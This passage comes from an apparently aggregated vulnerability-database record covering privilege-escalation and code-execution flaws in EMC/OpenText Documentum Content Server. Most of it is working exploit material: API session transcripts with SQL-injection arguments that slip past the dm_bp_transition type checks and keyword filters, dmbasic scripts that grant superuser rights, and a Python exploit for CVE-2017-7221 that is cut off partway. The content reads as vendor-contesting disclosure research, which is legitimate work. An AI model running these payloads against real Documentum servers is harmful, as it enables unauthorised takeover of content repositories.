\nSession id is s0 \nAPI> create,c,dm_sysobject \n... \n0801fd08805c9dfe \nAPI> set,c,l,object_name \nSET> test \n... \nOK \nAPI> setfile,c,l,test.ebs,crtext \n... \nOK \nAPI> save,c,l \n... \nOK \nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' \nrepo repo dmadmin \"\" 0000000000000000 0000000000000000 \n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id \nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\" \n0000000000000000 0000000000000000 0000000000000000 \"\" \n0 0 T F T T dmadmin 0000000000000000' \n \n... 
\n \n(1 row affected) \n \nAPI> Bye \n~]$ cat /tmp/test \ndm_bp_transition_has_vulnerability \n~]$ \n \nHere \u2018union \u2026\u2019 allows to bypass check based on \"id\" call: \n \nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle \nSession id is s0 \nAPI> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union \nselect r_object_id from dm_sysobject where \nr_object_id='0801fd08805c9dfe' \n... \n0801fd08805c9dfe \nAPI> apply,c,,GET_LAST_SQL \n... \nq0 \nAPI> next,c,q0 \n... \nOK \nAPI> get,c,q0,result \n... \n \nselect all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where \n((dm_procedure.r_object_id='0801fd08805c9dfe,')) and \n(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0) \nunion select all dm_sysobject.r_object_id from dm_sysobject_sp \ndm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe')) \nand (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0) \n \nAPI> close,c,q0 \n... \nOK \n \nComma is required to bypass error in fetch call: \nAPI> fetch,c,0801fd08805c9dfe' union select r_object_id from \ndm_sysobject where r_object_id='0801fd08805c9dfe \n... \n[DM_API_E_BADID]error: \"Bad ID given: 0801fd08805c9dfe' union \nselect r_object_id from dm_sysobject where r_object_id= \n'0801fd08805c9dfe\" \n \n \nAPI> fetch,c,0801fd08805c9dfe,' union select r_object_id from \ndm_sysobject where r_object_id='0801fd08805c9dfe \n... \nOK \n=================================>8================================ \n \n__ \nRegards, \nAndrey B. 
Panfilov \n`\n", "cvss": {"score": 8.2, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132628/emcdcs-contested.txt"}], "zdt": [{"lastseen": "2018-03-13T03:06:31", "description": "EMC Documentum Content Server suffers from a privilege escalation vulnerability.", "cvss3": {}, "published": "2015-08-19T00:00:00", "type": "zdt", "title": "EMC Documentum Content Server Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4531", "CVE-2011-4144", "CVE-2014-4622"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24074", "href": "https://0day.today/exploit/description/24074", "sourceData": "Product: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nIn 2011 Yuri Simone discovered a security flaw in EMC Documentum Content \r\nServer, which allows users with sysadmin privileges to elevate their \r\nprivileges to superuser (see CVE-2011-4144). On April 2014 I discovered \r\nanother set of vulnerabilities related to CVE-2011-4144 (see attached \r\nVRF#HUDHKNW4.txt). On September 2014 vendor announced a fix (see \r\nCVE-2014-4622) for the first only vulnerability from VRF#HUDHKNW4.txt (check \r\nrow 5 in CERT's spreadsheet for VU#315340 \r\n(http://www.kb.cert.org/vuls/id/315340)). Yesterday vendor announced a new \r\nfix (see CVE-2015-4531) related to VRF#HUDHKNW4.txt. Besides the fact that \r\nCVE-2015-4531 has a completely wrong description, CVE-2015-4531 does not \r\nintroduce any security fixes. I believe that there are about a dozen of \r\noptions to elevate privileges from sysadmin to superuser, but I'm going to \r\ndescribe the most obvious one.\r\n\r\n1. 
If attacker is able to create (or modify) docbase method (object with \r\ndm_method type) he is able to elevate his privileges through executing this \r\nmethod, example:\r\n\r\ncat > test.ebs\r\nConst CONNECTION_ERROR As Integer = 33\r\n\r\nSub rmain(d As String, u As String, g As String)\r\n s$ = dmAPIGet(\"connect,\" & d & \",\" & u & \",\")\r\n\r\n If s = \"\" Then\r\n dmExit(CONNECTION_ERROR)\r\n End If\r\n\r\n q$ = \"update dm_user objects\" & _\r\n \" set user_privileges=16\" & _\r\n \" where user_name='\" & g & \"'\"\r\n\r\n s=dmAPIExec(\"execquery,\" & s & \",T,\" & q)\r\n\r\nEnd Sub\r\n\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f92d\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> set,c,l,run_as_server\r\nSET> T\r\n...\r\nOK\r\nAPI> set,c,l,use_method_content\r\nSET> T\r\n...\r\nOK\r\nAPI> set,c,l,method_type\r\nSET> dmbasic\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\nAPI> retrieve,c,dm_user where user_name='test'\r\n...\r\n11024be980000e8a\r\nAPI> get,c,l,user_privileges\r\n...\r\n0\r\nAPI> apply,c,,DO_METHOD,METHOD,S,test,\r\n ARGUMENTS,S,'repo dmadmin test'\r\n...\r\nq0\r\nAPI> retrieve,c,dm_user where user_name='test'\r\n...\r\n11024be980000e8a\r\nAPI> get,c,l,user_privileges\r\n...\r\n16\r\n\r\n2. for the reason mentioned above regular users are unable to create or \r\nmodify docbase methods:\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f954\r\nAPI> save,c,l\r\n...\r\n[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: \"The current user (test)\r\n needs to have superuser or sysadmin privilege to save or destroy \r\ndm_method object.\"\r\n\r\n3. But sysadmins were able to create docbase methods. 
Now if sysadmin tries \r\nto create docbase method it gets following error:\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f968\r\nAPI> set,c,l,object_name\r\nSET> test1\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\n[DM_SYSOBJECT_E_LINK_PERMIT2]error: \"Linking or unlinking to the folder\r\n '/System/Methods' failed on sysobject '10024be98001f968'.\r\n WRITE permit is required on the folder, when using folder security.\"\r\n\r\n4. So, it is obvious that remediation provided by vendor relies on ACL \r\nrestrictions for /System/Methods folder, the problem is vendor does not take \r\ninto account that Content Server has a set of groups which allow to bypass \r\nACL restrictions and are still manageable by sysadmin users, example:\r\n\r\nAPI> ?,c,alter group dm_escalated_write add testadmin\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f969\r\nAPI> set,c,l,object_name\r\nSET> test1\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\n\r\n\r\n\r\n__\r\nRegards,\r\nAndrey B. 
Panfilov\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/24074", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-12T19:47:39", "description": "EMC Documentum Content Server suffers from an arbitrary code execution vulnerability.", "cvss3": {}, "published": "2015-08-19T00:00:00", "type": "zdt", "title": "EMC Documentum Content Server Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4532"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24075", "href": "https://0day.today/exploit/description/24075", "sourceData": "Product: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nFor detailed description see http://seclists.org/bugtraq/2015/Jul/51\r\n\r\nNew behavior introduced in CVE-2015-4532:\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\n repo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n 0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\r\n from dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n 0000000000000000 0000000000000000 0000000000000000 \"\"\r\n 0 0 T F T T dmadmin 0000000000000000'\r\n\r\n[DM_METHOD_E_METHOD_ARGS_INVALID]error:\r\n \"The arguments being passed to the method 'dm_bp_transition' are \r\ninvalid:\r\n arguments contain sql keywords which are not allowed.\"\r\n\r\n\r\nNew attack vector (note ALL keyword):\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\n repo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n 0000000000000000 \"0801fd08805c9dfe,'' union all select r_object_id\r\n from dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n 0000000000000000 0000000000000000 0000000000000000 \"\"\r\n 0 0 T F T T dmadmin 0000000000000000'\r\n\r\n__\r\nRegards,\r\nAndrey B. 
Panfilov\n\n# 0day.today [2018-04-12] #", "sourceHref": "https://0day.today/exploit/24075", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-08-16T08:17:45", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-25T00:00:00", "type": "exploitdb", "title": "OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2017-7221", "CVE-2014-2513", "CVE-2015-4533", "CVE-2017-7221"], "modified": "2017-04-25T00:00:00", "id": "EDB-ID:41928", "href": "https://www.exploit-db.com/exploits/41928", "sourceData": "'''\r\nCVE Identifier: CVE-2017-7221\r\nVendor: OpenText\r\nAffected products: OpenText Documentum Content Server (all versions)\r\nResearcher: Andrey B. 
Panfilov\r\nSeverity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\r\nFix: not available\r\nPoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44\r\n\r\nDescription: \r\n\r\nall versions of Documentum Content Server contain dm_bp_transition docbase \r\nmethod (\"stored procedure\u201d) which is written on basic, implementation of this docbase \r\nmethods does not properly validate user input which allows attacker to execute arbitrary \r\ncode with superuser privileges.\r\n\r\nRelated code snippet is:\r\n\r\n==========================================8<========================================\r\n\r\n'Evaluate the user-defined entry criteria\r\nIf (result = True And run_entry = \"T\") Then\r\nIf (debug = True) Then\r\nPrintToLog sess, \"Run user defined entry criteria.\"\r\nEnd If\r\n'\r\n' researcher comment:\r\n' userEntryID parameter is controlled by attacker\r\n'\r\nresult = RunProcedure(userEntryID, 1, sess, sysID,_\r\nuser_name, targetState)\r\nEnd If\r\n\r\n...\r\n\r\n'\r\n' researcher comment:\r\n' procID parameter is controlled by attacker\r\n'\r\n\r\nFunction RunProcedure(procID As String, procNo As Integer,_\r\nsessID As String, objID As String, userName As String,_\r\ntargetState As String) As Boolean\r\n\r\n...\r\n\r\nStartIt:\r\nIf (procID <> \"0000000000000000\") Then\r\nresult = CheckStatus(\"\", 1, \"loading procedure \" & procID, True, errorMsg)\r\n'\r\n' researcher comment:\r\n' here basic interpreter loads content of user-provided script\r\n' from underlying repostiory using following technique:\r\n' \r\n' checking that it is dealing with dm_procedure object\r\n' (check was introduced in CVE-2014-2513):\r\n' id,c,dm_procedure where r_object_id='procID'\r\n' \r\n' getting content of basic script\r\n' fetch,c,procID\r\n' getpath,c,l\r\n'\r\n\r\nresult = external(procID)\r\nIf (result = True) Then\r\nIf (procNo = 1) Then\r\n' --- Running user-defined entry criteria ---\r\nresult = CheckStatus(\"\", 1, 
\"Running EntryCriteria\", True, errorMsg)\r\nOn Error Goto NoFunction\r\n'\r\n' researcher comment\r\n' here dmbasic interpreter executes user defined function\r\n'\r\nresult = EntryCriteria(sessID, objID, userName,_\r\ntargetState, errorStack)\r\nIf (result = False) Then\r\nerrorStack = \"[ErrorCode] 1500 [ServerError] \" + _\r\nerrorStack\r\nEnd If\r\n\r\n==========================================>8========================================\r\n\r\nSo, attacker is able to create it\u2019s own basic procedure in repository and pass it\u2019s identifier\r\nas argument for dm_bp_transition procedure:\r\n\r\n\r\n==========================================8<========================================\r\n$ cat /tmp/test\r\ncat: /tmp/test: No such file or directory\r\n$ cat > test.ebs\r\nPublic Function EntryCriteria(ByVal SessionId As String,_\r\nByVal ObjectId As String,_\r\nByVal UserName As String,_\r\nByVal TargetState As String,_\r\nByRef ErrorString As String) As Boolean\r\nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\")\r\nEntryCriteria=True\r\nEnd Function\r\n$ iapi\r\nPlease enter a docbase name (docubase): repo\r\nPlease enter a user (dmadmin): unprivileged_user\r\nPlease enter password for unprivileged_user:\r\n\r\n\r\nEMC Documentum iapi - Interactive API interface\r\n(c) Copyright EMC Corp., 1992 - 2011\r\nAll rights reserved.\r\nClient Library Release 6.7.1000.0027\r\n\r\n\r\nConnecting to Server using docbase repo\r\n[DM_SESSION_I_SESSION_START]info: \"Session 0101d920800b1a37\r\nstarted for user unprivileged_user.\"\r\n\r\n\r\nConnected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle\r\nSession id is s0\r\nAPI> create,c,dm_procedure\r\n...\r\n0801d920804e5416\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\nAPI> ?,c,execute do_method with method='dm_bp_transition',\r\narguments='repo repo dmadmin \"\" 0000000000000000 
0000000000000000\r\n0000000000000000 0801d920804e5416 0000000000000000 0000000000000000\r\n0000000000000000 \"\" 0 0 T F T T dmadmin 0000000000000000'\r\n(1 row affected)\r\n\r\nAPI> Bye\r\n$ cat /tmp/test\r\ndm_bp_transition_has_vulnerability\r\n\r\n==========================================>8========================================\r\n\r\n\r\nThe vendor was notified about this vulnerability in November 2013 through the customer \r\nsupport channel; after a while the vendor started claiming that this vulnerability \r\nhad been remediated, though no CVE was announced. Moreover, the fix was contested\r\nand CERT/CC started tracking this vulnerability; the PoC provided\r\nto CERT/CC was:\r\n\r\n==========================================8<========================================\r\nThe vendor has decided that the root cause of the problem is that users are able to\r\ncreate dm_procedure objects, and now in Documentum Content Server\r\nv6.7SP1P26 we have the following behavior:\r\n\r\n[DM_SESSION_I_SESSION_START]info: \"Session 0101d920800f0174 started for\r\nuser unprivileged_user.\"\r\n\r\n\r\nConnected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle\r\nSession id is s0\r\nAPI> create,c,dm_procedure\r\n...\r\n0801d920805929d0\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\n[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: \"The current user\r\n(unprivileged_user) needs to have superuser or sysadmin privilege.\"\r\n\r\nBUT:\r\n\r\nAPI> create,c,dm_document\r\n...\r\n0901d920805929dd\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\n\r\nAPI> ?,c,execute do_method with\r\nmethod='dm_bp_transition',arguments='repo repo dmadmin \"\"\r\n0000000000000000 0000000000000000 0000000000000000 0901d920805929dd\r\n0000000000000000 0000000000000000 0000000000000000 \"\" 0 0 T F T T\r\ndmadmin 0000000000000000'\r\n(1 row 
affected)\r\n\r\n....\r\n\r\nAPI> Bye\r\n~]$ cat /tmp/test\r\ndm_bp_transition_has_vulnerability\r\n~]$\r\n\r\n==========================================>8========================================\r\n\r\nIn July 2014 the vendor announced ESA-2014-064, which claimed that the vulnerability had been remediated.\r\n\r\nIn November 2014 the fix was contested (there was a significant delay after ESA-2014-064 because the vendor \r\nconstantly fails to provide the status of reported vulnerabilities) by providing another proof of concept; the \r\ndescription provided to CERT/CC was:\r\n\r\n==========================================8<========================================\r\nI have tried to reproduce the PoC described in VRF#HUFPRMOP, and got the following\r\nerror:\r\n\r\n[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected\r\nerror: [DM_API_W_NO_MATCH]warning: \"There was no match in the\r\ndocbase for the qualification: dm_procedure where r_object_id =\r\n'0801fd08805c9dfe'\"\r\n\r\nSuch behaviour means that EMC tried to remediate a security issue by\r\n\"checking\" the object type of the supplied object:\r\n\r\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\r\nSession id is s0\r\nAPI> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'\r\n...\r\n[DM_API_W_NO_MATCH]warning: \"There was no match in the docbase for the\r\nqualification: dm_procedure where r_object_id = '0801fd08805c9dfe'\"\r\n\r\nAPI> Bye\r\n\r\nbin]$ strings dmbasic| grep dm_procedure\r\nid,%s,dm_procedure where object_name = '%s' and folder('%s')\r\nid,%s,dm_procedure where r_object_id = '%s'\r\n# old version of dmbasic binary\r\nbin]$ strings dmbasic| grep dm_procedure\r\nbin]$\r\n\r\nSo, the fix was implemented in the dmbasic binary; the problem is that neither the 6.7\r\nSP2 P15 nor the 6.7 SP1 P28 patch contains the dmbasic binary - the first patch\r\nthat shipped with the dmbasic binary was 6.7SP2 P17. 
Moreover, the\r\nissue is still reproducible because the introduced check can be bypassed\r\nusing SQL injection:\r\n\r\n~]$ cat test.ebs\r\nPublic Function EntryCriteria(ByVal SessionId As String,_\r\nByVal ObjectId As String,_\r\nByVal UserName As String,_\r\nByVal TargetState As String,_\r\nByRef ErrorString As String) As Boolean\r\nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\")\r\nEntryCriteria=True\r\nEnd Function\r\n~]$ cat /tmp/test\r\ncat: /tmp/test: No such file or directory\r\n\r\n~]$ iapi\r\nPlease enter a docbase name (docubase): repo\r\nPlease enter a user (dmadmin): test01\r\nPlease enter password for test01:\r\n\r\n\r\nEMC Documentum iapi - Interactive API interface\r\n(c) Copyright EMC Corp., 1992 - 2011\r\nAll rights reserved.\r\nClient Library Release 6.7.2190.0142\r\n\r\n\r\nConnecting to Server using docbase repo\r\n[DM_SESSION_I_SESSION_START]info: \"Session 0101fd088014000c started for\r\nuser test01.\"\r\n\r\n\r\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\r\nSession id is s0\r\nAPI> create,c,dm_sysobject\r\n...\r\n0801fd08805c9dfe\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\r\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n0000000000000000 0000000000000000 0000000000000000 \"\"\r\n0 0 T F T T dmadmin 0000000000000000'\r\n\r\n...\r\n\r\n(1 row affected)\r\n\r\nAPI> Bye\r\n~]$ cat /tmp/test\r\ndm_bp_transition_has_vulnerability\r\n~]$\r\n\r\nHere \"union ...\" bypasses the check based on the \"id\" call:\r\n\r\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\r\nSession id is s0\r\nAPI> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union\r\nselect r_object_id 
from dm_sysobject where\r\nr_object_id='0801fd08805c9dfe'\r\n...\r\n0801fd08805c9dfe\r\nAPI> apply,c,,GET_LAST_SQL\r\n...\r\nq0\r\nAPI> next,c,q0\r\n...\r\nOK\r\nAPI> get,c,q0,result\r\n...\r\n\r\nselect all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where\r\n((dm_procedure.r_object_id='0801fd08805c9dfe,')) and\r\n(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)\r\nunion select all dm_sysobject.r_object_id from dm_sysobject_sp\r\ndm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))\r\nand (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)\r\n\r\nAPI> close,c,q0\r\n...\r\nOK\r\n\r\nThe comma is required to bypass the error in the fetch call:\r\nAPI> fetch,c,0801fd08805c9dfe' union select r_object_id from\r\ndm_sysobject where r_object_id='0801fd08805c9dfe\r\n...\r\n[DM_API_E_BADID]error: \"Bad ID given: 0801fd08805c9dfe' union\r\nselect r_object_id from dm_sysobject where r_object_id=\r\n'0801fd08805c9dfe\"\r\n\r\n\r\nAPI> fetch,c,0801fd08805c9dfe,' union select r_object_id from\r\ndm_sysobject where r_object_id='0801fd08805c9dfe\r\n...\r\nOK\r\n==========================================>8========================================\r\n\r\nIn August 2015 the vendor undertook another attempt to remediate this vulnerability;\r\ncheck ESA-2015-131/CVE-2015-4533 for details.\r\n\r\nIn August 2015 the fix was contested; check http://seclists.org/bugtraq/2015/Aug/110\r\nfor a detailed description - I just demonstrated another attack vector - using the \r\nUNION ALL keyword instead of UNION:\r\n\r\n=================================8<================================\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\r\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n0000000000000000 0000000000000000 0000000000000000 \"\"\r\n0 0 T F T T dmadmin 
0000000000000000'\r\n\r\n[DM_METHOD_E_METHOD_ARGS_INVALID]error:\r\n\"The arguments being passed to the method 'dm_bp_transition' are\r\ninvalid:\r\narguments contain sql keywords which are not allowed.\"\r\n\r\n\r\nNew attack vector (note the ALL keyword):\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n0000000000000000 \"0801fd08805c9dfe,'' union all select r_object_id\r\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n0000000000000000 0000000000000000 0000000000000000 \"\"\r\n0 0 T F T T dmadmin 0000000000000000'\r\n\r\n=================================>8================================\r\n\r\n\r\nRecently I have noticed that the latest versions of Documentum Content\r\nServer are not affected by the PoC provided above; however, all versions\r\nof Documentum Content Server are still vulnerable because the vendor incorrectly\r\nimplemented input validation: they convert arguments to lower/upper-case, \r\nreplace line feed, carriage return and tab characters with a space, \r\nremove double spaces, and after that they check whether the resulting string contains \r\nthe special keywords ('union ' and 'union all') or not - it is possible \r\nto use other whitespace characters like backspace, which is demonstrated\r\nin the PoC. \r\n\r\n\r\n__\r\n\r\nRegards,\r\nAndrey B. 
Panfilov\r\n\r\n\r\n\r\nCVE-2017-7221.py\r\n'''\r\n\r\n#!/usr/bin/env python\r\n\r\nimport socket\r\nimport sys\r\nfrom os.path import basename\r\n\r\nfrom dctmpy.docbaseclient import DocbaseClient\r\nfrom dctmpy.obj.typedobject import TypedObject\r\n\r\nCIPHERS = \"ALL:aNULL:!eNULL\"\r\n\r\n\r\ndef usage():\r\n    print \"usage:\\n\\t%s host port user password\" % basename(sys.argv[0])\r\n\r\n\r\ndef main():\r\n    if len(sys.argv) != 5:\r\n        usage()\r\n        exit(1)\r\n\r\n    (session, docbase) = create_session(*sys.argv[1:5])\r\n\r\n    if is_super_user(session):\r\n        print \"Current user is a superuser, nothing to do\"\r\n        exit(1)\r\n\r\n    install_owner = session.serverconfig['r_install_owner']\r\n    document_id = session.next_id(0x08)\r\n    content_id = session.next_id(0x06)\r\n\r\n    store = session.get_by_qualification(\"dm_store\")\r\n    format = session.get_by_qualification(\"dm_format where name='crtext'\")\r\n    handle = session.make_pusher(store['r_object_id'])\r\n    if handle < 1:\r\n        print \"Unable to create pusher\"\r\n        exit(1)\r\n\r\n    data = \"Public Function EntryCriteria(ByVal SessionId As String,_\" \\\r\n           \"\\nByVal ObjectId As String,_\" \\\r\n           \"\\nByVal UserName As String,_\" \\\r\n           \"\\nByVal TargetState As String,_\" \\\r\n           \"\\nByRef ErrorString As String) As Boolean\" \\\r\n           \"\\nDim QueryID As String\" \\\r\n           \"\\nDim Query As String\" \\\r\n           \"\\nQuery = \\\"query,c,update dm_user objects set \" \\\r\n           \"user_privileges=16 where user_name=\\'%s\\'\\\"\" \\\r\n           \"\\nQueryID = dmAPIGet(Query)\" \\\r\n           \"\\nQueryID = dmAPIExec(\\\"commit,c\\\")\" \\\r\n           \"\\nEntryCriteria=True\" \\\r\n           \"\\nEnd Function\" % (sys.argv[3])\r\n\r\n    b = bytearray()\r\n    b.extend(data)\r\n\r\n    if not session.start_push(handle, content_id, format['r_object_id'], len(b)):\r\n        print \"Failed to start push\"\r\n        exit(1)\r\n\r\n    session.upload(handle, b)\r\n    data_ticket = session.end_push_v2(handle)['DATA_TICKET']\r\n\r\n    procedure = False\r\n    try:\r\n        print \"Trying to create dm_procedure\"\r\n        document = TypedObject(session=session)\r\n        document.set_string(\"OBJECT_TYPE\", \"dm_procedure\")\r\n        document.set_bool(\"IS_NEW_OBJECT\", True)\r\n        document.set_int(\"i_vstamp\", 0)\r\n        document.set_int(\"world_permit\", 7)\r\n        document.set_string(\"object_name\", \"CVE-2014-2513\")\r\n        document.set_string(\"r_object_type\", \"dm_procedure\")\r\n        document.append_id(\"i_contents_id\", content_id)\r\n        document.set_int(\"r_page_cnt\", 1)\r\n        document.set_string(\"a_content_type\", format['name'])\r\n        document.set_bool(\"i_has_folder\", True)\r\n        document.set_bool(\"i_latest_flag\", True)\r\n        document.set_id(\"i_chronicle_id\", document_id)\r\n        document.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"])\r\n        document.set_int(\"r_content_size\", len(b))\r\n        if session.sys_obj_save(document_id, document):\r\n            procedure = True\r\n    except Exception, e:\r\n        print str(e)\r\n\r\n    if not procedure:\r\n        print \"Failed to create dm_procedure\"\r\n        print \"Trying to create dm_sysobject\"\r\n        document = TypedObject(session=session)\r\n        document.set_string(\"OBJECT_TYPE\", \"dm_sysobject\")\r\n        document.set_bool(\"IS_NEW_OBJECT\", True)\r\n        document.set_int(\"i_vstamp\", 0)\r\n        document.set_string(\"owner_name\", sys.argv[3])\r\n        document.set_int(\"world_permit\", 7)\r\n        document.set_string(\"object_name\", \"CVE-2017-7221\")\r\n        document.set_string(\"r_object_type\", \"dm_sysobject\")\r\n        document.append_id(\"i_contents_id\", content_id)\r\n        document.set_int(\"r_page_cnt\", 1)\r\n        document.set_string(\"a_content_type\", format['name'])\r\n        document.set_bool(\"i_has_folder\", True)\r\n        document.set_bool(\"i_latest_flag\", True)\r\n        document.set_id(\"i_chronicle_id\", document_id)\r\n        document.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"])\r\n        document.set_int(\"r_content_size\", len(b))\r\n        if not session.sys_obj_save(document_id, document):\r\n            print \"Failed to create dm_sysobject\"\r\n            exit(1)\r\n\r\n    content = TypedObject(session=session)\r\n    content.set_string(\"OBJECT_TYPE\", \"dmr_content\")\r\n    content.set_bool(\"IS_NEW_OBJECT\", True)\r\n    content.set_id(\"storage_id\", store['r_object_id'])\r\n    content.set_id(\"format\", format['r_object_id'])\r\n    content.set_int(\"data_ticket\", data_ticket)\r\n    content.set_id(\"parent_id\", document_id)\r\n    content.set_int(\"page\", 0)\r\n    content.set_string(\"full_format\", format['name'])\r\n    content.set_int(\"content_size\", len(b))\r\n    if not session.save_cont_attrs(content_id, content):\r\n        print \"Failed to create content\"\r\n        exit(1)\r\n\r\n    if procedure:\r\n        query = \"execute do_method WITH METHOD='dm_bp_transition',\" \\\r\n                \" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\\r\n                \"0000000000000000 0000000000000000 \\\"%s\\\" \" \\\r\n                \"0000000000000000 0000000000000000 0000000000000000 \" \\\r\n                \"\\\"\\\" 0 0 T F T T %s %s'\" % \\\r\n                (docbase, docbase, install_owner, document_id,\r\n                 install_owner, session.session)\r\n    else:\r\n        query = \"execute do_method WITH METHOD='dm_bp_transition',\" \\\r\n                \" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\\r\n                \"0000000000000000 0000000000000000 